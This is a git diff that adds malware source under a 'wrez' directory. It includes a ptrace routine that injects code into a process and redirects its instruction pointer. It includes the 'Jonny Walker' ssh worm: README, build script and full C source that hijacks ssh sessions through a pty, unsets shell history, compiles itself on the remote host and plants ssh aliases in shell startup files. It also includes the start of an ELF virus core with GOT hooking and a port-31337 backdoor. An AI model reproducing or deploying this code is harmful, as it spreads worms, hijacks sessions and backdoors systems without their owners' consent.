+        /* redirect eip */
+        memset (&regs, 0, sizeof (regs));
+        if (ptrace (PTRACE_GETREGS, cpid, NULL, &regs) < 0) {
+                perror ("ptrace PTRACE_GETREGS");
+                exit (EXIT_FAILURE);
+        }
+        // write eip */
+        safed_eip = regs.regs.eip;
+        regs.regs.eip = 0xbffff010;
+        if (ptrace (PTRACE_SETREGS, cpid, NULL, &regs) < 0) {
+                perror ("ptrace PTRACE_GETREGS");
+                exit (EXIT_FAILURE);
+        }
+
+        if (ptrace (PTRACE_CONT, cpid, NULL, NULL) < 0) {
+                perror ("ptrace PTRACE_CONT");
+                exit (EXIT_FAILURE);
+        }
+
+        wait (NULL);
+        printf ("detrap\n");
+
+        /* restore */
+        for (addr_walker = 0 ; addr_walker < 256 ; ++addr_walker) {
+                ptrace (PTRACE_POKEDATA, cpid, addr + addr_walker,
+                        data_saved[addr_walker] & 0xff);
+        }
+
+        /* restore regs */
+        regs.regs.eip = safed_eip;
+        if (ptrace (PTRACE_SETREGS, cpid, NULL, &regs) < 0) {
+                perror ("ptrace PTRACE_GETREGS");
+                exit (EXIT_FAILURE);
+        }
+
+        if (ptrace (PTRACE_DETACH, cpid, NULL, NULL) < 0) {
+                perror ("ptrace PTRACE_DETACH");
+                exit (EXIT_FAILURE);
+        }
+
+        exit (EXIT_SUCCESS);
+}
+
+
+
+void
+hexdump (unsigned char *data, unsigned int amount)
+{
+        unsigned int    dp, p;  /* data pointer */
+        const char      trans[] =
+                "................................ !\"#$%&'()*+,-./0123456789"
+                ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
+                "nopqrstuvwxyz{|}~...................................."
+                "....................................................."
+                "........................................";
+
+        for (dp = 1; dp <= amount; dp++) {
+                printf ("%02x ", data[dp-1]);
+                if ((dp % 8) == 0)
+                        printf (" ");
+                if ((dp % 16) == 0) {
+                        printf ("| ");
+                        p = dp;
+                        for (dp -= 16; dp < p; dp++)
+                                printf ("%c", trans[data[dp]]);
+                        printf ("\n");
+                }
+        }
+        if ((amount % 16) != 0) {
+                p = dp = 16 - (amount % 16);
+                for (dp = p; dp > 0; dp--) {
+                        printf ("   ");
+                        if (((dp % 8) == 0) && (p != 8))
+                                printf (" ");
+                }
+                printf (" | ");
+                for (dp = (amount - (16 - p)); dp < amount; dp++)
+                        printf ("%c", trans[data[dp]]);
+        }
+        printf ("\n");
+
+        return;
+}
diff --git a/other/wrez/tmp/str.c b/other/wrez/tmp/str.c
new file mode 100644
index 0000000..d822f20
--- /dev/null
+++ b/other/wrez/tmp/str.c
@@ -0,0 +1,30 @@
+
+#include <stdio.h>
+
+#define STRINGPTR(dst,string) \
+{ \
+        register unsigned char * regtmp; \
+        \
+        __asm__ __volatile__ ( \
+                "       call    l0_%=\n\t" \
+                "       .ascii  \""##string"\"\n\t" \
+                "       .byte   0x00\n\t" \
+                "l0_%=: popl    %%eax\n\t" \
+                : "=a" (regtmp)); \
+\
+        (dst) = regtmp; \
+}
+
+
+int
+main (int argc, char *argv[])
+{
+        char *  foo;
+
+        
+        STRINGPTR(foo,"foobarcow");
+
+        printf ("%s\n", foo);
+}
+
+
diff --git a/other/wrez/unistd.h b/other/wrez/unistd.h
new file mode 100644
index 0000000..6af5a6f
--- /dev/null
+++ b/other/wrez/unistd.h
@@ -0,0 +1,281 @@
+#ifndef ASM_I386_UNISTD_H
+#define ASM_I386_UNISTD_H
+
+#ifndef NULL
+#define NULL    ((void *) 0x0)
+#endif
+/*
+ * This file contains the system call numbers.
+ */
+
+#define __NR_exit                 1
+#define __NR_fork                 2
+#define __NR_read                 3
+#define __NR_write                4
+#define __NR_open                 5
+#define __NR_close                6
+#define __NR_waitpid              7
+#define __NR_creat                8
+#define __NR_link                 9
+#define __NR_unlink              10
+#define __NR_execve              11
+#define __NR_chdir               12
+#define __NR_time                13
+#define __NR_mknod               14
+#define __NR_chmod               15
+#define __NR_lchown              16
+#define __NR_break               17
+#define __NR_oldstat             18
+#define __NR_lseek               19
+#define __NR_getpid              20
+#define __NR_mount               21
+#define __NR_umount              22
+#define __NR_setuid              23
+#define __NR_getuid              24
+#define __NR_stime               25
+#define __NR_ptrace              26
+#define __NR_alarm               27
+#define __NR_oldfstat            28
+#define __NR_pause               29
+#define __NR_utime               30
+#define __NR_stty                31
+#define __NR_gtty                32
+#define __NR_access              33
+#define __NR_nice                34
+#define __NR_ftime               35
+#define __NR_sync                36
+#define __NR_kill                37
+#define __NR_rename              38
+#define __NR_mkdir               39
+#define __NR_rmdir               40
+#define __NR_dup                 41
+#define __NR_pipe                42
+#define __NR_times               43
+#define __NR_prof                44
+#define __NR_brk                 45
+#define __NR_setgid              46
+#define __NR_getgid              47
+#define __NR_signal              48
+#define __NR_geteuid             49
+#define __NR_getegid             50
+#define __NR_acct                51
+#define __NR_umount2             52
+#define __NR_lock                53
+#define __NR_ioctl               54
+#define __NR_fcntl               55
+#define __NR_mpx                 56
+#define __NR_setpgid             57
+#define __NR_ulimit              58
+#define __NR_oldolduname         59
+#define __NR_umask               60
+#define __NR_chroot              61
+#define __NR_ustat               62
+#define __NR_dup2                63
+#define __NR_getppid             64
+#define __NR_getpgrp             65
+#define __NR_setsid              66
+#define __NR_sigaction           67
+#define __NR_sgetmask            68
+#define __NR_ssetmask            69
+#define __NR_setreuid            70
+#define __NR_setregid            71
+#define __NR_sigsuspend          72
+#define __NR_sigpending          73
+#define __NR_sethostname         74
+#define __NR_setrlimit           75
+#define __NR_getrlimit           76
+#define __NR_getrusage           77
+#define __NR_gettimeofday        78
+#define __NR_settimeofday        79
+#define __NR_getgroups           80
+#define __NR_setgroups           81
+#define __NR_select              82
+#define __NR_symlink             83
+#define __NR_oldlstat            84
+#define __NR_readlink            85
+#define __NR_uselib              86
+#define __NR_swapon              87
+#define __NR_reboot              88
+#define __NR_readdir             89
+#define __NR_mmap                90
+#define __NR_munmap              91
+#define __NR_truncate            92
+#define __NR_ftruncate           93
+#define __NR_fchmod              94
+#define __NR_fchown              95
+#define __NR_getpriority         96
+#define __NR_setpriority         97
+#define __NR_profil              98
+#define __NR_statfs              99
+#define __NR_fstatfs            100
+#define __NR_ioperm             101
+#define __NR_socketcall         102
+#define __NR_syslog             103
+#define __NR_setitimer          104
+#define __NR_getitimer          105
+#define __NR_stat               106
+#define __NR_lstat              107
+#define __NR_fstat              108
+#define __NR_olduname           109
+#define __NR_iopl               110
+#define __NR_vhangup            111
+#define __NR_idle               112
+#define __NR_vm86old            113
+#define __NR_wait4              114
+#define __NR_swapoff            115
+#define __NR_sysinfo            116
+#define __NR_ipc                117
+#define __NR_fsync              118
+#define __NR_sigreturn          119
+#define __NR_clone              120
+#define __NR_setdomainname      121
+#define __NR_uname              122
+#define __NR_modify_ldt         123
+#define __NR_adjtimex           124
+#define __NR_mprotect           125
+#define __NR_sigprocmask        126
+#define __NR_create_module      127
+#define __NR_init_module        128
+#define __NR_delete_module      129
+#define __NR_get_kernel_syms    130
+#define __NR_quotactl           131
+#define __NR_getpgid            132
+#define __NR_fchdir             133
+#define __NR_bdflush            134
+#define __NR_sysfs              135
+#define __NR_personality        136
+#define __NR_afs_syscall        137 /* Syscall for Andrew File System */
+#define __NR_setfsuid           138
+#define __NR_setfsgid           139
+#define __NR__llseek            140
+#define __NR_getdents           141
+#define __NR__newselect         142
+#define __NR_flock              143
+#define __NR_msync              144
+#define __NR_readv              145
+#define __NR_writev             146
+#define __NR_getsid             147
+#define __NR_fdatasync          148
+#define __NR__sysctl            149
+#define __NR_mlock              150
+#define __NR_munlock            151
+#define __NR_mlockall           152
+#define __NR_munlockall         153
+#define __NR_sched_setparam             154
+#define __NR_sched_getparam             155
+#define __NR_sched_setscheduler         156
+#define __NR_sched_getscheduler         157
+#define __NR_sched_yield                158
+#define __NR_sched_get_priority_max     159
+#define __NR_sched_get_priority_min     160
+#define __NR_sched_rr_get_interval      161
+#define __NR_nanosleep          162
+#define __NR_mremap             163
+#define __NR_setresuid          164
+#define __NR_getresuid          165
+#define __NR_vm86               166
+#define __NR_query_module       167
+#define __NR_poll               168
+#define __NR_nfsservctl         169
+#define __NR_setresgid          170
+#define __NR_getresgid          171
+#define __NR_prctl              172
+#define __NR_rt_sigreturn       173
+#define __NR_rt_sigaction       174
+#define __NR_rt_sigprocmask     175
+#define __NR_rt_sigpending      176
+#define __NR_rt_sigtimedwait    177
+#define __NR_rt_sigqueueinfo    178
+#define __NR_rt_sigsuspend      179
+#define __NR_pread              180
+#define __NR_pwrite             181
+#define __NR_chown              182
+#define __NR_getcwd             183
+#define __NR_capget             184
+#define __NR_capset             185
+#define __NR_sigaltstack        186
+#define __NR_sendfile           187
+#define __NR_getpmsg            188     /* some people actually want streams */
+#define __NR_putpmsg            189     /* some people actually want streams */
+#define __NR_vfork              190
+#define __NR_stat64             195
+
+/* user-visible error numbers are in the range -1 - -122: see <asm-i386/errno.h> */
+
+#define __syscall_return(type, res) \
+do { \
+        if ((unsigned long)(res) >= (unsigned long)(-125)) { \
+                errno = -(res); \
+                res = -1; \
+        } \
+        return (type) (res); \
+} while (0)
+
+/* XXX - _foo needs to be __foo, while __NR_bar could be _NR_bar. */
+#define _syscall0(type,name) \
+type name(void) \
+{ \
+long __res; \
+__asm__ volatile ("int $0x80" \
+        : "=a" (__res) \
+        : "0" (__NR_##name)); \
+__syscall_return(type,__res); \
+}
+
+#define _syscall1(type,name,type1,arg1) \
+type name(type1 arg1) \
+{ \
+long __res; \
+__asm__ volatile ("int $0x80" \
+        : "=a" (__res) \
+        : "0" (__NR_##name),"b" ((long)(arg1))); \
+__syscall_return(type,__res); \
+}
+
+#define _syscall2(type,name,type1,arg1,type2,arg2) \
+type name(type1 arg1,type2 arg2) \
+{ \
+long __res; \
+__asm__ volatile ("int $0x80" \
+        : "=a" (__res) \
+        : "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2))); \
+__syscall_return(type,__res); \
+}
+
+#define _syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \
+type name(type1 arg1,type2 arg2,type3 arg3) \
+{ \
+long __res; \
+__asm__ volatile ("int $0x80" \
+        : "=a" (__res) \
+        : "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
+                  "d" ((long)(arg3))); \
+__syscall_return(type,__res); \
+}
+
+#define _syscall4(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4) \
+type name (type1 arg1, type2 arg2, type3 arg3, type4 arg4) \
+{ \
+long __res; \
+__asm__ volatile ("int $0x80" \
+        : "=a" (__res) \
+        : "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
+          "d" ((long)(arg3)),"S" ((long)(arg4))); \
+__syscall_return(type,__res); \
+} 
+
+#define _syscall5(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \
+          type5,arg5) \
+type name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5) \
+{ \
+long __res; \
+__asm__ volatile ("int $0x80" \
+        : "=a" (__res) \
+        : "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
+          "d" ((long)(arg3)),"S" ((long)(arg4)),"D" ((long)(arg5))); \
+__syscall_return(type,__res); \
+}
+
+
+#endif /* _ASM_I386_UNISTD_H_ */
+
diff --git a/other/wrez/victim b/other/wrez/victim
new file mode 100755
index 0000000..e67e2b0
--- /dev/null
+++ b/other/wrez/victim
diff --git a/other/wrez/walker/README b/other/wrez/walker/README
new file mode 100644
index 0000000..4565d02
--- /dev/null
+++ b/other/wrez/walker/README
@@ -0,0 +1,21 @@
+Jonny Walker 1.0
+================
+
+Jonny is a ssh worm. Make sure you know what you are doing
+before starting or compiling it.
+
+Jonny will define aliases from "$HOME/ " to ssh and
+/usr/bin/ssh. Once user calls ssh to log into a remote
+site, Jonny will slip the real ssh output through a pty
+and controls the whole session. Once it sees prompt of remote
+shell he will plant himself there so that following ssh
+sessions from that account will be wormed too.
+Appropriate backdooring-functions may be added very easily.
+
+To build Jonny, just type './plant'. Then
+"./walker root@remote.host"
+
+To remove Jonny, remove the ssh aliases from .bashrc,
+.bash_profile and .cshrc. Also remove ' ' binary in ~.
+
+
diff --git a/other/wrez/walker/beautify b/other/wrez/walker/beautify
new file mode 100644
index 0000000..1810291
--- /dev/null
+++ b/other/wrez/walker/beautify
@@ -0,0 +1,6 @@
+while (<>) {
+        s/\t//g;
+        s/\/\/[^\n]+//g;
+        print;
+}
+
diff --git a/other/wrez/walker/fixsize b/other/wrez/walker/fixsize
new file mode 100755
index 0000000..1138843
--- /dev/null
+++ b/other/wrez/walker/fixsize
@@ -0,0 +1,14 @@
+#!/usr/bin/perl
+
+my $i = shift;
+my $o = shift;
+open I, "<$i" or die "$!";
+open O, ">$o" or die "$!";
+my $size = (stat $i)[7];
+
+while (<I>) {
+        s/9999/$size/;
+        print O;
+}
+close I; close O;
+
diff --git a/other/wrez/walker/plant b/other/wrez/walker/plant
new file mode 100755
index 0000000..22fcb6c
--- /dev/null
+++ b/other/wrez/walker/plant
@@ -0,0 +1,13 @@
+#!/bin/sh
+
+# run this to build 'walker' binary
+# which infects remote system if used
+# instead of ssh binary
+
+cat walker.c|perl beautify|cat>w.c
+./fixsize w.c w2.c
+cc -O2 w2.c -o walker
+strip walker
+cat w2.c>>walker
+rm -f w.c w2.c
+
diff --git a/other/wrez/walker/walker b/other/wrez/walker/walker
new file mode 100755
index 0000000..fca2f3d
--- /dev/null
+++ b/other/wrez/walker/walker
diff --git a/other/wrez/walker/walker.c b/other/wrez/walker/walker.c
new file mode 100644
index 0000000..fb40898
--- /dev/null
+++ b/other/wrez/walker/walker.c
@@ -0,0 +1,278 @@
+// I partly ripped the idea from a friend who did similar
+// things in a different way. However this solution seems
+// more usable.
+#include <stdio.h>
+#include <sys/types.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <unistd.h>
+#include <sys/ioctl.h>
+#include <termios.h>
+#include <string.h>
+
+
+FILE *me;
+
+int open_pty(int *master, int *slave)
+{
+        char devpty[] = "/dev/ptyXY";
+        char *s1 = "pqrstuvwxyzPQRST",
+             *s2 = "0123456789abcdef";
+
+        for (; *s1 != 0; ++s1) {
+                devpty[8] = *s1;
+                for (; *s2 != 0; ++s2) {
+                        devpty[9] = *s2;
+                        if ((*master = open(devpty, O_RDWR|O_NOCTTY)) < 0) {
+                                if (errno == ENOENT)
+                                        return -1;
+                                else
+                                        continue;
+                        }
+                        devpty[5] = 't';
+                        if ((*slave = open(devpty, O_RDWR|O_NOCTTY)) < 0) {
+                                close(*master);
+                                return -1;
+                        }
+                        return 0;
+                }
+        }
+        return -1;                                              
+}
+
+
+char crept_in = 0;
+
+// contains buf the shellprompt?
+char check_shell(char *buf)
+{
+        int l = strlen(buf);
+        if (l < 2)
+                return 0;
+        if ((buf[l-2] == '#' || buf[l-2] == '>' ||
+            buf[l-2] == ')' || buf[l-2] == '$') &&
+            buf[l-1] == ' ')
+                return 1;
+        return 0;
+}
+
+// read until you see shellprompt
+int s_read(int fd, char *d, size_t dl)
+{
+        do {
+                memset(d, 0, dl);
+                if (read(fd, d, dl) <= 0)
+                        return -1;
+        } while (!check_shell(d));
+        return 0;
+}
+
+
+// read exactly until string s seen
+// do not even read one byte more
+int read_until(int fd, char *s)
+{
+        char *buf = (char*)calloc(1, 128);
+        char *ptr = buf;
+        int l = 0, n = 0, i = 1, N = 0;
+
+        do {
+                l = read(fd, ptr, 1);
+                if (l <= 0) {
+                        free(buf);
+                        return -1;
+                }
+                ++ptr; ++n; ++N;
+                if (n >= 127) {
+                        ++i; n = 0;
+                        buf = (char*)realloc(buf, 128*i);
+                        ptr = buf+N;
+                        memset(ptr, 0, 128);
+                }
+        } while (strstr(buf, s) == NULL);
+
+        free(buf);
+        return 0;
+}
+
+
+int creep_in(int fd)
+{
+        char dummy[4096],
+             *shell = "\x24SHELL\n",
+             *cat = "dd of=x2.c bs=1 count=9999\n",
+             *noecho = "unset HISTFILE\n",
+             *cc = "cc x2.c -o ' ';cat x2.c>>' ';rm -f x2.c\n",
+             *test = "grep -q -s ssh .bashrc;echo \x24?\n",
+
+             *plant = "echo >>.bashrc;"
+                      "echo alias ssh=\"\x24HOME/'\x5c '\">>.bashrc;"
+                      "echo alias /usr/bin/ssh=\"\x24HOME/'\x5c '\">>.bashrc;"
+
+                      "echo >>.bash_profile;"
+                      "echo alias ssh=\"\x24HOME/'\x5c '\">>.bash_profile;"
+                      "echo alias /usr/bin/ssh=\"\x24HOME/'\x5c '\">>.bash_profile;"
+
+                      "echo >>.cshrc;"
+                      "echo alias ssh \"\x24HOME/'\x5c '\">>.cshrc;"
+                      "echo alias /usr/bin/ssh \"\x24HOME/'\x5c '\">>.cshrc\n",
+
+             *exit = "stty echo;exit\n",
+             *newsh = "exec \x24SHELL\n";
+        int i = 0;
+        struct termios t, ot;
+
+        // disable echo on master or we would
+        // read twice what we wrote to shell
+        tcgetattr(fd, &t); ot = t; t.c_lflag &= ~ECHO;
+        tcsetattr(fd, TCSANOW, &t);
+        
+        write(fd, shell, strlen(shell));
+        read_until(fd, "\x24SHELL");
+
+        s_read(fd, dummy, sizeof(dummy));
+
+        write(fd, noecho, strlen(noecho));
+        read_until(fd, "\n");
+        s_read(fd, dummy, sizeof(dummy));
+
+        write(fd, test, strlen(test)); // see if account is already infected
+        read_until(fd, "\n");
+        memset(dummy, 0, sizeof(dummy));
+        read(fd, dummy, 1);
+
+        printf("infected: %c\r\n", dummy[0]);
+
+        if (dummy[0] == '0')
+                s_read(fd, dummy, sizeof(dummy)); // infected
+        else {  
+                s_read(fd, dummy, sizeof(dummy)); // not infected
+
+                write(fd, cat, strlen(cat));
+                read_until(fd, "\n");
+
+                while (fgets(dummy, sizeof(dummy), me))
+                        write(fd, dummy, strlen(dummy));
+
+                read_until(fd, "records out");
+                s_read(fd, dummy, sizeof(dummy));
+
+                write(fd, cc, strlen(cc));
+                read_until(fd, "\n");
+                s_read(fd, dummy, sizeof(dummy));
+
+                write(fd, plant, strlen(plant));
+                read_until(fd, "\n");
+                s_read(fd, dummy, sizeof(dummy));
+        }
+
+        write(fd, exit, strlen(exit));
+        read_until(fd, "\n");
+        s_read(fd, dummy, sizeof(dummy));
+
+        write(fd, newsh, strlen(newsh));
+        read_until(fd, "\x24SHELL");
+
+        s_read(fd, dummy, sizeof(dummy));// read 2nd time b/c
+                                         // $ from $SHELL matched again
+
+        // reset terminal mode
+        tcsetattr(fd, TCSANOW, &ot);
+        return 0;
+}
+
+
+extern char **environ;
+
+int main(int argc, char **argv)
+{
+        int m, s, r;
+        char **ssh, buf[4096];
+        fd_set rset;
+        struct termios t, ot;
+        struct winsize ws;
+
+
+        ssh = (char**)calloc(argc, sizeof(char *));
+        for (m = 0; m < argc; ++m) {
+                ssh[m] = (char*)calloc(strlen(argv[m])+10, 1);
+                strcpy(ssh[m], argv[m]);
+        }
+        strcpy(ssh[0], "ssh");
+        me = fopen(*argv, "r");
+        memset(*argv, 0, strlen(*argv)); strcpy(*argv, "ssh");
+
+        fseek(me, -9999, SEEK_END);
+        
+        setbuffer(stdin, NULL, 0);
+        setbuffer(stdout, NULL, 0);
+
+        if (open_pty(&m, &s) < 0)
+                return 1;
+
+        // make term raw
+        tcgetattr(m, &t); ot = t; cfmakeraw(&t);
+        t.c_cc[VMIN] = 1;
+        t.c_cc[VTIME] = 0;
+        tcsetattr(0, TCSANOW, &t);
+
+        // set correct size on slave
+        if (ioctl(0, TIOCGWINSZ, (char*)&ws) >= 0)
+                ioctl(s, TIOCSWINSZ, (char*)&ws);
+
+
+        if (fork() == 0) {
+                setsid();
+                // make slave point to stdin/stdout/stderr and the 
+                // controlling terminal
+                dup2(s, 0); dup2(s, 1); dup2(s, 2);
+                close(m); close(s);
+                ioctl(0, TIOCSCTTY, 0);
+                execve("/usr/bin/ssh", ssh, environ);
+                execve("/usr/local/bin/ssh", ssh, environ);
+                execve("/usr/sbin/ssh", ssh, environ);
+                exit(1);
+        }
+        close(s);
+
+
+        // standard lame I/O multiplex
+        while (1) {
+                FD_ZERO(&rset);
+                FD_SET(0, &rset);
+                FD_SET(m, &rset);
+
+                if (select(m+1, &rset, NULL, NULL, NULL) < 0) {
+                        if (errno == EAGAIN)
+                                continue;
+                        else
+                                break;
+                }
+                memset(buf, 0, sizeof(buf));
+                if (FD_ISSET(0, &rset)) {
+                        r = read(0, buf, sizeof(buf));
+                        if (r <= 0)
+                                break;
+                        if (write(m, buf, r) < 0)
+                                break;
+                }
+                if (FD_ISSET(m, &rset)) {
+                        r = read(m, buf, sizeof(buf));
+                        if (r <= 0)
+                                break;
+                        if (write(1, buf, r) < 0)
+                                break;
+                        if (!crept_in && check_shell(buf)) {
+                                crept_in = 1;
+                                creep_in(m);
+                        }
+                                
+                                
+                }
+        }
+
+        // reset terminal
+        tcsetattr(0, TCSANOW, &ot);
+        return 0;
+}
+
diff --git a/other/wrez/wrconfig.h b/other/wrez/wrconfig.h
new file mode 100644
index 0000000..92a190f
--- /dev/null
+++ b/other/wrez/wrconfig.h
@@ -0,0 +1,82 @@
+
+#ifndef WRCONFIG_H
+#define WRCONFIG_H
+
+#pragma pack(1)
+
+#define VICTIM_LEN      32
+
+
+/* wrdynconfig
+ *
+ * only active after the first infection has taken place.
+ */
+
+typedef struct {
+        unsigned char   cnul;   /* constant 0x00 */
+        unsigned int    flags;  /* various flags, see below */
+
+        /* flag dependant fields
+         */
+        unsigned int    icount; /* (WRF_GENERATION_LIMIT) infection count */
+        unsigned int    curhost;        /* (WRF_KEEP_FINGERPRINT) this host */
+
+        unsigned char   xxx_temp[8];    /* FIXME: temporary filename for testing */
+} wrdynconfig;
+
+/* flag access macros
+ */
+#define WRF_ISSET(flags,flagmask) \
+        (((flags) & (flagmask)) == (flagmask))
+#define WRF_SET(flags,flagmask) \
+        (flags) |= (flagmask);
+#define WRF_CLEAR(flags,flagmask) \
+        (flags) &= ~(flagmask);
+#define WRF_TOGGLE(flags,flagmask) \
+        (flags) ^= (flagmask);
+
+/* limit propagation by icount, icount is decreased until it reaches 0 */
+#define WRF_GENERATION_LIMIT    0x00000001
+/* always keep a fingerprint of the current host in curhost */
+#define WRF_GET_FINGERPRINT     0x00000002
+
+
+typedef struct {
+        unsigned long int       wr_start;       /* virtual start address */
+        unsigned long int       decomp_len;
+        unsigned long int       wr_oldctors;    /* original .ctors address */
+
+        unsigned long int       elf_base;       /* &elf_header[0] of host */
+
+        union {
+                /* upon first infection the victim array is used to carry the
+                 * name of the executeable to be infected.
+                 * afterwards (i.e. any other infection) this space is
+                 * recycled for data specifying various properties of the
+                 * virus. see wrcore.c for a more in-depth explanation.
+                 *
+                 * first infection (set by the "initial" program):
+                 *    victim = filename to be infected
+                 *    vcfgptr = pointer to memory which will overwrite the
+                 *        vcfg structure.
+                 */
+                struct {
+                        unsigned char   victim[VICTIM_LEN];
+                        void *          vcfgptr;
+                } vinit;
+
+                wrdynconfig     vcfg;
+        } dyn;
+
+        /* compression related data
+         */
+        unsigned long int       cmprlen;
+        unsigned char           llstuff;
+        unsigned short int      hl1stuff;
+        unsigned char           hl2stuff;
+        unsigned char           hf2stuff;
+} wrconfig;
+
+#endif
+
+
diff --git a/other/wrez/wrcore.c b/other/wrez/wrcore.c
new file mode 100644
index 0000000..f2219d2
--- /dev/null
+++ b/other/wrez/wrcore.c
@@ -0,0 +1,1133 @@
+/* wrez infector core
+ */
+
+#include <elf.h>
+#include "int80.h"
+#include "int80-net.h"
+#include "unistd.h"
+
+#include "wrconfig.h"
+#include "wrezdefs.h"
+#include "fingerprint.h"
+#include "lime-interface.h"
+#include "lookup.h"
+
+#include "common.c"
+#include "wrutil.c"
+
+
+#define WREZ_SIZE_COMP (cfg->cmprlen + cfg->decomp_len)
+
+
+/* static prototypes plus the central wrez_main function
+ */
+
+int wrez_main (wrconfig *cfg);
+static inline int isinfected (char *filename);
+static inline void infect (wrconfig *cfg, char *filename, char *mvfile);
+static unsigned int infect_image (wrconfig *cfg, unsigned char *dest,
+        unsigned long int new_entry);
+static inline void fixup_ctors (int vfd, unsigned long int old_addr,
+        unsigned long int new_addr, unsigned int startseek,
+        unsigned int lenseek);
+static inline int look_user (wrconfig *cfg);
+static inline int look_user_proc (wrconfig *cfg, char *t_proc,
+        unsigned char *filename);
+static int mmap (void  *start, long length, int prot, int flags,
+        int fd, long offset);
+unsigned int fp_get (void);
+
+
+/* define-dependant prototypes
+ */
+
+#ifdef  LOOKUP_GOT_DEEP_REDIRECTION_EXAMPLE
+static void ex_wrez_got_deep_redirect (wrconfig *cfg);
+static int ex_wrez_malloc (int size);
+#endif
+
+#ifdef  LOOKUP_GOT_REDIRECTION_EXAMPLE
+static void ex_wrez_got_redirect (wrconfig *cfg);
+static int ex_wrez_got_test (char *toprint);
+#endif
+
+#ifdef  LOOKUP_LIBC_CALL_EXAMPLE
+static void ex_wrez_libc_call (wrconfig *cfg);
+#endif
+
+#ifdef  LOOKUP_BACKDOOR_NETWORK_MAGIC
+static void backdoor_network (wrconfig *cfg);
+static int backdoor_network_accept (int s, void *addr, int addr_len);
+int backdoor_network_check (int sock);
+#define MAGIC_PORT 31337
+#endif
+
+
+/* core infection function, doing all the work
+ *
+ * the return value controls the environment code in wrez.asm:
+ *
+ * == 0: erase all virus memory before passing control to host application
+ * != 0: keep virus in memory forever
+ */
+int
+wrez_main (wrconfig *cfg)
+{
+        char *          foo;    /* TODO: remove this ;) */
+        char            initfilename[VICTIM_LEN];       /* temporary copy */
+        wrdynconfig *   dcfg = &cfg->dyn.vcfg;
+
+
+#ifdef  LOOKUP_LIBC_CALL_EXAMPLE
+        ex_wrez_libc_call (cfg);
+#endif
+
+#ifdef  LOOKUP_GOT_REDIRECTION_EXAMPLE
+        ex_wrez_got_redirect (cfg);
+#endif
+
+#ifdef  LOOKUP_GOT_DEEP_REDIRECTION_EXAMPLE
+        ex_wrez_got_deep_redirect (cfg);
+#endif
+
+#ifdef  LOOKUP_BACKDOOR_NETWORK_MAGIC
+        backdoor_network (cfg);
+#endif
+
+        /* first infection run
+         */
+        if (cfg->dyn.vcfg.cnul != 0) {
+                memcpy (initfilename, cfg->dyn.vinit.victim, VICTIM_LEN);
+
+                /* if initial infection process passed us a configuration
+                 * structure pointer, copy it.
+                 */
+                if (cfg->dyn.vinit.vcfgptr != NULL) {
+                        memcpy ((unsigned char *) &cfg->dyn.vcfg,
+                                (unsigned char *) cfg->dyn.vinit.vcfgptr,
+                                sizeof (cfg->dyn.vcfg));
+                }
+
+                /* now infect the initial victim, exit afterwards
+                 */
+                if (isinfected (initfilename) == 0)
+                        infect (cfg, initfilename, (char *) 0);
+
+                return (1);
+        }
+
+        /* XXX: put runtime related stuff, such as GOT hook code in here
+         */
+
+
+        /*** this is executed in all other infection runs (normal case)
+         */
+
+        /* WRF_GENERATION_LIMIT */
+        if (WRF_ISSET (dcfg->flags, WRF_GENERATION_LIMIT)) {
+                /* this is already the last (infertile) generation
+                 */
+                if (dcfg->icount == 0)
+                        return (1);
+
+                /* else just decrease icount, since if we won't propagate,
+                 * then its not used anyway.
+                 */
+                dcfg->icount -= 1;
+        }
+
+#ifdef  FINGERPRINT
+        /* WRF_GET_FINGERPRINT */
+        if (WRF_ISSET (dcfg->flags, WRF_GET_FINGERPRINT)) {
+                dcfg->curhost = fp_get ();
+        }
+#endif
+
+        /* FIXME: this is testing code only, to test propagation
+         */
+        if (isinfected (dcfg->xxx_temp) != 0) {
+                STRINGPTR (foo, "infected\\n");
+                write (2, foo, 9);
+        } else {
+                STRINGPTR (foo, "tmp");
+                infect (cfg, dcfg->xxx_temp, (char *) foo);
+        }
+
+        return (1);
+}
+
+
+#ifdef  LOOKUP_GOT_DEEP_REDIRECTION_EXAMPLE
+static void
+ex_wrez_got_deep_redirect (wrconfig *cfg)
+{
+        char *          mallocstr;
+        Elf32_Word *    mallocgot[8];
+        Elf32_Word *    cgot;           /* correct got slot */
+        void *          mymalloc;
+        char *          sostr;
+
+
+        STRINGPTR (mallocstr, "malloc");
+        STRINGPTR (sostr, "shared-library.so");
+
+        if (got_funcloc_array ((void *) cfg->elf_base, mallocstr, mallocgot, 8,
+                sostr) != 1)
+        {
+                STRINGPTR (mallocstr, "got_funcloc_array != 1\\n");
+                write (2, mallocstr, 24);
+
+                return;
+        }
+
+        cgot = mallocgot[0];
+        FUNCPTR (mymalloc, "ex_wrez_malloc");
+
+        PTRINSTALL (mymalloc, *cgot, cgot, cfg);
+        *cgot = (Elf32_Word) mymalloc;
+}
+
+
+static int
+ex_wrez_malloc (int size)
+{
+        int             (* chain)(int);
+
+        int             rval;
+        char *          m;
+
+        CHAINSTART(chain);
+
+        STRINGPTR (m, "wrez_malloc\\n");
+        write (2, m, 13);
+
+        CHAINCALL;
+        rval = chain (size);
+
+        /* did the .got entry change? (lazy binding)
+         */
+        CHAINEND;
+
+        CHAINCALL;
+        return (rval);
+}
+#endif
+
+
+#ifdef  LOOKUP_GOT_REDIRECTION_EXAMPLE
+static void
+ex_wrez_got_redirect (wrconfig *cfg)
+{
+        char *          printfstr;
+        Elf32_Word *    printf;
+        void *          myprintf;
+
+
+        STRINGPTR (printfstr, "printf");
+        printf = got_funcloc ((void *) cfg->elf_base, printfstr);
+        FUNCPTR (myprintf, "ex_wrez_got_test");
+
+        if (printf != NULL) {
+                PTRINSTALL (myprintf, *printf, printf, cfg);
+                *printf = (Elf32_Word) myprintf;        /* overwrite .got entry */
+        }
+}
+
+
+static int
+ex_wrez_got_test (char *toprint)
+{
+        int             (* chain)(char *);
+
+        int             rval;
+        char *          m;
+
+
+        CHAINSTART (chain);
+
+
+        STRINGPTR (m, "wrez_got_test\\n");
+        write (2, m, 14);
+
+        rval = chain (toprint);
+
